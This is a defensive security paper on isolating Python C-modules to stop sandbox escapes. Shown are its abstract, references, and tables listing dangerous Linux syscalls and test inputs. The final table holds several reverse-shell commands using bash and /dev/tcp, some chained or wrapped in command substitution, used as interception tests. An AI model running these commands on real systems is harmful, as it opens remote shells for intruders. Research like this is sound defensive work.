Python Sandbox Escape Defense Mechanism Based on Third-Party Library Isolation

doi:10.3969/j.issn.1671-1122.2024.05.003

Abstract

Abstract:

The PaaS platform has become a popular cloud service due to its ability to provide Python services. PaaS platform utilizes Python sandboxes to ensure security, while also allowing users to use optimized Python C-modules to reduce the impact of Python on performance. However, attackers can exploit vulnerabilities in Python sandbox policies to escape and harm the underlying system. Most of the existing Python sandboxes are used for defense at the code level, lacking supervision and protection of Python C-modules. This paper analyzed the underlying principles of Python C-modules and the characteristics of Python sandbox escapes. Targeting the specific dangerous functions executed after the sandbox escape, this paper proposed a Python sandbox escape defense mechanism based on third-party library isolation and implemented a prototype system. The prototype system leveraged GOT Hook technology to take over C-module import and dangerous function call in Python. Therefore, the system was capable of checking and isolating C-modules before they were imported. Moreover, when dangerous functions were called, the system checked the parameters. The experimental results demonstrate that the system effectively mitigates attacker’s abusively use of custom C-modules to escape Python sandboxes and calling dangerous functions with malicious parameter. The mechanism has negligible overheads in normal Python applications, with an average time overhead of less than 5%.

Key words: Python sandbox, third-party library isolation, sandbox escape defense mechanism, Hook technology

CLC Number:

TP309

YANG Zhipeng, WANG Juan, MA Chenjun, KANG Yunfeng. Python Sandbox Escape Defense Mechanism Based on Third-Party Library Isolation[J]. Netinfo Security, 2024, 24(5): 682-693.

Figures/Tables 13

References 36

[1]	TIOBE. TIOBE Index for March 2023[EB/OL]. (2023-02-25)[2023-03-08]. https://www.tiobe.com/tiobe-index/.
[2]	Slant. What are the Best Platform-as-a-Services (PaaS) to Deploy a Python Web Application[EB/OL]. (2022-10-10)[2023-03-08]. https://www.slant.co/topics/356/-best-platform-as-a-services-PaaS-to-deploy-a-python-web-application.
[3]	Baked Potato999. Virtualenv Sandbox Escape[EB/OL]. (2018-09-30)[2023-03-08]. https://github.com/pypa/virtualenv/issues/1207.
[4]	SEO J, LAM M S. InvisiType: Object-Oriented Security Policies[EB/OL]. (2010-01-01)[2023-03-08]. https://www.researchgate.net/publication/ 221655452_InvisiType_Object-Oriented_Security_Policies.
[5]	SUN Ming, GU Dawu, LI Juanru, et al. PyXhon: Dynamic Detection of Security Vulnerabilities in Python Extensions[C]// IEEE. 2012 IEEE International Conference on Information Science and Technology. New York: IEEE, 2012: 461-466.
[6]	WANG Heng. Research on Python Sandbox on PaaS Platform[D]. Nanjing: Nanjing University, 2014.
	王衡. PaaS平台上Python沙箱研究[D]. 南京: 南京大学, 2014.
[7]	LIU Peiyao. Research and Implementation of Vulnerability Detection in Python Scripts[D]. Beijing: Beijing Jiaotong University, 2019.
	刘佩瑶. Python脚本的脆弱性检测研究与实现[D]. 北京: 北京交通大学, 2019.
[8]	PARK T, LETTNER J, NA Y, et al. Bytecode Corruption Attacks are Real-And How to Defend Against Them[C]// Springer. The 15th Detection of Intrusions and Malware, and Vulnerability Assessment (DIMVA 2018). Heidelberg: Springer, 2018: 326-348.
[9]	JUSTIN C, ARMON D, JEFF R, et al. Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code[C]// ACM. The 17th ACM Conference on Computer and Communications Security (CCS’10). New York: ACM, 2010: 212-223.
[10]	Seattle Testbed. Repy_v2[EB/OL]. (2021-12-22)[2023-03-09]. https://github.com/SeattleTestbed/repy_v2.
[11]	The PyPy Project. PyPy’s Sandboxing Features[EB/OL]. (2019-08-23)[2023-03-09]. https://doc.pypy.org/en/latest/sandbox.html.
[12]	JIANG Chengman, HUA Baojian, FAN Qiliang, et al. Empirical Security Study of Native Code in Python Virtual Machines[J]. Computer Science, 2022, 49(6A): 474-479. doi: 10.11896/jsjkx.210600200
	蒋成满, 华保健, 樊淇梁, 等. Python虚拟机本地代码的安全性实证研究[J]. 计算机科学, 2022, 49(6A): 474-479. doi: 10.11896/jsjkx.210600200
[13]	GREAMO C, GHOSH A. Sandboxing and Virtualization: Modern Tools for Combating Malware[J]. IEEE Security & Privacy, 2011, 9(2): 79-82.
[14]	Python Software Foundation. OS-Miscellaneous Operating System Interfaces[EB/OL]. (2023-01-13)[2023-03-14]. https://docs.python.org/3/library/os.html.
[15]	Python Software Foundation. Subprocess-Subprocess Management[EB/OL].(2023-02-25)[2023-03-14]. https://docs.python.org/3/library/subprocess.html.
[16]	Python Software Foundation. Ctypes-A Foreign Function Library for Python[EB/OL]. (2023-01-10)[2023-03-14]. https://docs.python.org/3/library/ctypes.html.
[17]	Python Software Foundation. Extending Python with C or C++[EB/OL]. (2023-02-05)[2023-03-14]. https://docs.python.org/3/extending/extending.html.
[18]	CHEN Ru. Python Source Code Analysis: Deep Exploration of Dynamic Language Core Technologies[M]. Beijing: Electronic Industry Press, 2018.
	陈儒. Python 源码剖析:深度探索动态语言核心技术[M]. 北京: 电子工业出版社, 2018.
[19]	YU Jiazi. Self Cultivation of Programmers-Linking, Loading, and Libraries[M]. Beijing: Electronic Industry Press, 2009.
	俞甲子. 程序员的自我修养—链接、装载与库[M]. 北京: 电子工业出版社, 2009.
[20]	TAN Gang. Principles and Implementation Techniques of Software-Based Fault Isolation[J]. Foundations and Trends in Privacy and Security, 2017, 1(3): 137-198.
[21]	YEE B, SEHR D, DARDYK G, et al. Native Client: A Sandbox for Portable, Untrusted x86 Native Code[J]. Communications of the ACM, 2010, 53(1): 91-99.
[22]	Web Assembly Community Group. Introduction[EB/OL]. (2023-03-28)[2023-04-05]. https://webassembly.github.io/spec/core/intro/introduction.html.
[23]	NARAYAN S, DISSELKOEN C, GARFINKEL T, et al. Retrofitting Fine Grain Isolation in the Firefox Renderer[C]// USENIX. The 29th USENIX Conference on Security Symposium. Berkeley: USENIX, 2020: 699-716.
[24]	BOSAMIYA J, LIM W S, PARNO B. {Provably-Safe} Multilingual Software Sandboxing Using {Web Assembly}[C]// USENIX. 31st USENIX Security Symposium (USENIX Security 22). Berkeley: USENIX, 2022: 1975-1992.
[25]	BAUER M, ROSSOW C. Cali: Compiler-Assisted Library Isolation[C]// ACM. The 2021 ACM Asia Conference on Computer and Communications Security. New York: ACM, 2021: 550-564.
[26]	QIAN Weizhong, CAO Yong, DAI Weiqi, et al. Libsec: A Hardware Virtualization-Based Isolation for Shared Library[C]// IEEE. 2017 IEEE 19th International Conference on High Performance Computing and Communications. New York: IEEE, 2017: 34-41.
[27]	VOULIMENEAS A, VINCK J, MECHELINCK R, et al. You Shall Not (By) Pass! Practical, Secure, and Fast PKU-Based Sandboxing[C]// ACM. The Seventeenth European Conference on Computer Systems. New York: ACM, 2022: 266-282.
[28]	XU Yuanchao, YE Chencheng, SOLIHIN Y, et al. Hardware-Based Domain Virtualization for Intra-Process Isolation of Persistent Memory Objects[C]// IEEE. 2020 ACM/IEEE 47th Annual International Symposium on Computer Architecture (ISCA). New York: IEEE, 2020: 680-692.
[29]	KIRTH P. Practical Methods for Automatic Intra-Process Compartmentalization with MPK[D]. California: University of California, 2021.
[30]	BAUER M, ROSSOW C. Cali: Compiler-Assisted Library Isolation[C]// ACM. The 2021 ACM Asia Conference on Computer and Communications Security. New York: ACM, 2021: 550-564.
[31]	Wikipedia Contributors. Buffer Overflow Protection[EB/OL]. (2006-04-05)[2023-04-05]. https://en.wikipedia.org/w/index.php?title=Buffer_overflow_protection&oldid=1142587744.
[32]	BUROW N, ZHANG Xinping, PAYER M. SoK: Shining Light on Shadow Stacks[C]// IEEE. 2019 IEEE Symposium on Security and Privacy (SP). New York: IEEE, 2019: 985-999.
[33]	KUZNETSOV V, SZEKERES L, PAYER M, et al. {Code-Pointer} Integrity[C]// USENIX. 11th USENIX Symposium on Operating Systems Design and Implementation (OSDI 14). Berkeley: USENIX, 2014: 147-163.
[34]	MICHAEL K. Ld. so(8) -Linux Manual Page[EB/OL]. (2022-06-14)[2023-04-25]. https://man7.org/linux/man-pages/man8/ld.so.8.html.
[35]	Victor Stinner. The Python Performance Benchmark Suite[EB/OL]. (2016-08-14)[2023-04-05]. https://pyperformance.readthedocs.io/index.html.
[36]	ANDREY I. AI Benchmark for Windows, Linux and MacOS: Let the AI Games Begin[EB/OL]. (2019-06-28)[2023-04-05]. https://ai-benchmark.com/alpha.

名称	针对攻击面			方法	性能开销	兼容性
名称	Python 代码	Python 虚拟机	C化模块	方法	性能开销	兼容性
InvisiType^[4]	√	—	—	扩展原始类	低	只支持面向对象编程的Python应用
PyXhon^[5]	√	—	—	关键函数和字节码跟踪	高	较好
OpSandBox^[6]	√	—	—	字节码插桩+访问控制	中	仅支持Python 2且无法监控二进制代码
文献[7]方法	√	—	—	污点分析+机器学习	高	较好
文献[8]方法	√	√	—	限制字节码对象为只读	高	较好
Repy^[10]	√	√	—	Python微内核+安全分层	中	C化模块可能无法正常运行
PyPy^[11]	√	√	—	进程隔离+ 限制特权功能	低	C化模块可能无法正常运行
PyGuard^[12]	—	√	—	过程内分析+ 漏洞模式识别	高	较好
本文机制	√	—	√	第三方库隔离	低	较好

API	作用	备注
mmap()	映射内存	映射可写可执行内存，执行任意shellcode
mprotect()	修改内存属性	修改内存属性为可写可执行，执行shellcode
mremap()	重新映射内存	将内存重新映射为可写可执行，执行shellcode
shmat()	映射共享内存	将共享内存映射为可写可执行，执行shellcode
prctl	进程控制	提权、隐藏进程等
execve()	执行程序	执行恶意程序
execveat()	执行程序	执行恶意程序
popen()	执行命令	执行恶意命令、开启后门等
system()	执行命令	执行恶意命令、开启后门等

API	作用	备注
ptrace()	进程跟踪	恶意控制其他进程
process_vm_readv()	读其他进程的数据	恶意读取其他进程数据
process_vm_writev()	向其他进程写入数据	恶意修改其他进程数据
kill()	向其他进程发送信号	恶意杀死其他进程
settimeofday()	设置系统时间	恶意修改系统时间
clock_settime()	设置系统时钟	恶意修改系统时间
clock_adjtime()	调整系统时钟	恶意修改系统时钟
adjtimex()	调整内核时钟	恶意修改系统时间
setuid()/setgid()	设置UID/GID	提权
setreuid()	设置real和effective UID	提权
setregid()	设置real和effective GID	提权
setgroups()	设置进程用户组	提权
setresuid()	设置real和effective UID，以及set-user-ID	提权
setresgid()	设置real和effective GID，以及set-group-ID	提权
setfsuid()/setfsgid()	设置文件系统检查时的有效UID/GID	提权
capset()	设置Capability	提权
iopl()/ioperm()	设置端口权限	提权
add_key()	向内核添加密钥	提权
mount()	挂载文件系统	恶意挂载机密分区
unmount2()/unmount()	卸载文件系统	恶意卸载必要文件系统
chroot()	切换根目录	沙箱逃逸
unshare()	创建并进入新namespace	提权、沙箱逃逸
setns()	切换namespace	沙箱逃逸
acct()	开启或关闭系统审计	逃避审计
reboot()	重启	破坏系统正常运行
quotactl()	操纵磁盘配额	破坏系统正常运行
sethostname()	设置hostname	破坏系统正常运行
setdomainname()	设置domain name	破坏系统正常运行
bpf()	在内核执行bpf程序	执行恶意bpf程序

对象	结果
正常模块	正常导入，并且模块功能正常
恶意模块	禁止导入，并且检测到调用了popen

参数	功能	结果
echo ls\|bash	间接执行指令	拦截
ls	遍历文件系统	未拦截
ls \|\| bash -i >&/dev/tcp/[ip]/[port] 0>&1	反弹shell	拦截
bash -i >&/dev/tcp/[ip]/[port] 0>&1	反弹shell	拦截
echo bash	输出字符串	未拦截
$( bash -i >&/dev/tcp/[ip]/[port] 0>&1)	反弹shell	拦截
$(ls)	遍历文件系统	未拦截
bash -i >&/dev/tcp/[ip]/[port] 0>&1	反弹shell	拦截